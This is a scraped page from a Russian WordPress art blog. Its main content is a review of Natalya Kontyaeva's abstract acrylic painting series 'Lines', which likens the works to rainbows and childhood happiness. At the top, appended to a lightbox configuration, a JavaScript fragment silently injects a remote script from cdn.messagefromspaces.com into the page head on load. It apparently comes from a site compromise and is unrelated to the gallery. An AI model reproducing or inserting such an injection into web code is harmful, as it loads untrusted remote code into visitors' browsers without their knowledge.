, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Серия абстрактных картин «Линии»

Автор: Наталья Юрова | 19 Июн 2012

Серия абстрактных картин "Линии"Продолжаем знакомиться с творчеством Натальи Контяевой и посмотрим на серию абстрактных картин "Линии" : «Отражение», «Мелодия», «Энергия».

При первом же взгляде на картины возникает ассоциация с радугой: контрастной, яркой, имеющей плавные линии, возбуждающей радостные чувства и заряжающие положительной энергетикой. Для многих из нас радуга вызывает  образы детства. Каждый из нас наверняка помнит, как папа, мама или друг вдруг с восторженным взглядом  указывал нам пальцем в небо и кричал: «Смотри! Радуга!». Это было каким-то чудом, подарком небес! Серия абстрактных картин "Линии"И даже сейчас, когда мы выросли и воспитываем своих собственных детей, появление радуги на небе по-прежнему приводит нас в неописуемый восторг, и мы радуемся ей, как тогда, в детстве… Детство – пора насыщенности, полноты жизни, которая «бьет ключом». Все вокруг кажется добрым, красочным, радужным, позитивным. Не зря, когда мы вводим в Интернете в поисковой строке слово «Позитив», мы видим тысячи разноцветных картинок в цветовой гамме радуги.

Катины выполнены на холсте кистью с использованием акрила. Любой из нас может объяснить по-своему названия картин.  Здесь можно увидеть и отражение настроения, то радостного  то грустного, и мелодию души, судьбы, с ее взлетами и падениями, и даже энергию нашей жизни, такой непредсказуемой, с ее извилистыми дорогами.

Серия абстрактных картин "Линии"Обратите внимание, что ни одна из линий не является замкнутой. Даже те из них, которые образуют круг, не заканчиваются, а переходят в другие, что опять же указывает нам на бесконечность, незаконченность. Как будто  художница говорит нам, что линия (например, судьбы) пойдет в том направлении, куда мы сами ее направим.

Так как Наталья Контяева занимается настенными росписями, то данные изображения  могут стать отличным украшением интерьера, как по отдельности, так и вместе.  Жить в постоянном присутствии радуги – разве это не здорово?

Темы: Критика, картины для интерьера | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress